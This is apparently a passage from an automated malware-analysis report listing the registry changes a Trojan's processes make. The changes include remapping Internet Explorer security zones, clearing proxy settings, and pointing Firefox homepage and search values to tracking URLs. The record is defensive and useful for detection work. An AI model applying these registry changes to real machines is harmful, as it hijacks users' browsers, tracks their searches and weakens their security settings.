[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
The process chcUpdateSrv.html5:1700 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKU\.DEFAULT\Software\ADCA2197E17DE989DA91F56322BE0AB0]
"c" = "2"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\LocalService\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKU\.DEFAULT\Software\ADCA2197E17DE989DA91F56322BE0AB0]
"o" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
[HKU\.DEFAULT\Software\ADCA2197E17DE989DA91F56322BE0AB0]
"d" = "20160719"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\{8C4CE252-7DB2-4F8E-8E76-BAD0E5826A83}]
"Day" = "20160719"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKU\.DEFAULT\Software\{8C4CE252-7DB2-4F8E-8E76-BAD0E5826A83}]
"Day" = "20160719"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE E2 1B F9 8B 29 F0 74 C2 42 39 8C 5D BE EE 6F"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\chcUpdateSrv\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Trojan sets the Local Intranet zone under HKU\.DEFAULT to include all local (intranet) sites not listed in other zones; these are the default zone options that WinINet writes on first use in this profile:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan sets the Local Intranet zone to include all sites that bypass the proxy server:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan sets the Local Intranet zone to include all network paths (UNCs):
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\chcUpdateSrv\DEBUG]
"Trace Level"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
The process chcUpdateSrv.html5:548 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 8B C1 73 98 FB 1E AB A1 D6 76 64 68 27 B7 57"
The process ckehack.html5:1692 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft]
"help" = "http://d2ucfwpxlh3zh3.cloudfront.net/?ts=AHEqC3UsBH8sC0..&v=20160718&uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&mode=loadmex"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 5B E1 3B 4D 28 1C B9 D1 41 D5 BC 8C 3E 05 E5"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKCU\Software\Microsoft]
"First" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The process ckehack.html5:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A 37 E0 7B AF 05 D1 FD 9A 2C EE AA D8 71 AE 19"
[HKLM\SOFTWARE\{E6276374-DE18-4AA5-A365-9016A2F98A2D}]
"F" = "1"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\Coabuied\DeElevator.dllg1t,"
[HKLM\SOFTWARE\{E6276374-DE18-4AA5-A365-9016A2F98A2D}]
"c" = "1"
The process ckehack.html5:456 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\ckehack\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 29 58 D2 57 A0 E4 18 4F 29 D9 F6 04 11 22 77"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\ckehack\DEBUG]
"Trace Level"
The process ckehack.html5:2032 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"UID" = "ADCA2197E17DE989DA91F56322BE0AB0"
[HKLM\SOFTWARE\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"hp" = "http://d2ucfwpxlh3zh3.cloudfront.net/?ts=AHEqC3UsBH8sC0..&v=20160718&uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&mode=ffsengext"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"SPName" = "hohosearch"
[HKCU\Software\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"s" = "HtTp://d2jeaw7c5nmwo6.cloudfront.net/gkozn0k4?uid=%s&update0=version,%s&update1=sys,%s&update4=ref,%s&update5=mode,%s&update6=sys0,%s&update7=sys1,%s&update8=sys2,%s&update9=sys3,%s&update10=sys4,%s"
[HKLM\SOFTWARE\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"UID" = "ADCA2197E17DE989DA91F56322BE0AB0"
[HKCU\Software\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"SP" = "http://d2ucfwpxlh3zh3.cloudfront.net/chrome.php?uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&q={searchTerms}&ts=AHEqC3UsBH8sC0..&v=20160718&mode=ffsengext"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"s" = "HtTp://d2jeaw7c5nmwo6.cloudfront.net/gkozn0k4?uid=%s&update0=version,%s&update1=sys,%s&update4=ref,%s&update5=mode,%s&update6=sys0,%s&update7=sys1,%s&update8=sys2,%s&update9=sys3,%s&update10=sys4,%s"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"tab" = "http://d2ucfwpxlh3zh3.cloudfront.net/?ts=AHEqC3UsBH8sC0..&v=20160718&uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&mode=ffsengext"
"SP" = "http://d2ucfwpxlh3zh3.cloudfront.net/chrome.php?uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&q={searchTerms}&ts=AHEqC3UsBH8sC0..&v=20160718&mode=ffsengext"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKCU\Software\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"surl" = "http://d2ucfwpxlh3zh3.cloudfront.net/chrome.php?uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&ts=AHEqC3UsBH8sC0..&v=20160718&mode=ffexttoolbar&q="
[HKLM\SOFTWARE\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"surl" = "http://d2ucfwpxlh3zh3.cloudfront.net/chrome.php?uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&ts=AHEqC3UsBH8sC0..&v=20160718&mode=ffexttoolbar&q="
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 59 2E 1E 9D DB 08 4E 38 1B DC F1 F2 1B B8 9C"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKCU\Software\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"SPName" = "hohosearch"
"tab" = "http://d2ucfwpxlh3zh3.cloudfront.net/?ts=AHEqC3UsBH8sC0..&v=20160718&uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&mode=ffsengext"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKCU\Software\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"hp" = "http://d2ucfwpxlh3zh3.cloudfront.net/?ts=AHEqC3UsBH8sC0..&v=20160718&uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&mode=ffsengext"
The process nop.exe:1512 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 64 A8 0F 9E 15 B8 FB F7 3D D2 89 25 4F AA A9"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process 1.tmp.exe:1340 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 B4 B5 9A 60 BD 66 BF A9 06 E5 3D 38 69 57 7B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"amisetup7548__10235_il2.exe" = "X-Series Install Package"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web nodes with no dots, which do not belong to any zone, to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process 1.tmp.exe:1836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 77 2B EA EF BB 9B 67 8D AB F9 80 A8 61 70 E5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"amisetup7604__99999_il2.exe" = "X-Series Install Package"
[HKCU\Software\InstallPath\Status]
"NationZoom" = "N"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web nodes with no dots, which do not belong to any zone, to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process 1.tmp.exe:2732 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F C2 A3 79 77 97 46 C8 D9 A0 4F 85 78 6E E8 E8"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"amisetup7816__16582_il2.exe" = "X-Series Install Package"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web nodes with no dots, which do not belong to any zone, to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process ping.exe:560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 81 74 47 6D B1 95 4B 8C EB 04 05 03 8B 92 8B"
The process ping.exe:1008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 5B C3 2B C6 47 28 1C 54 78 93 A1 89 49 C6 E1"
The process %original file name%.exe:600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
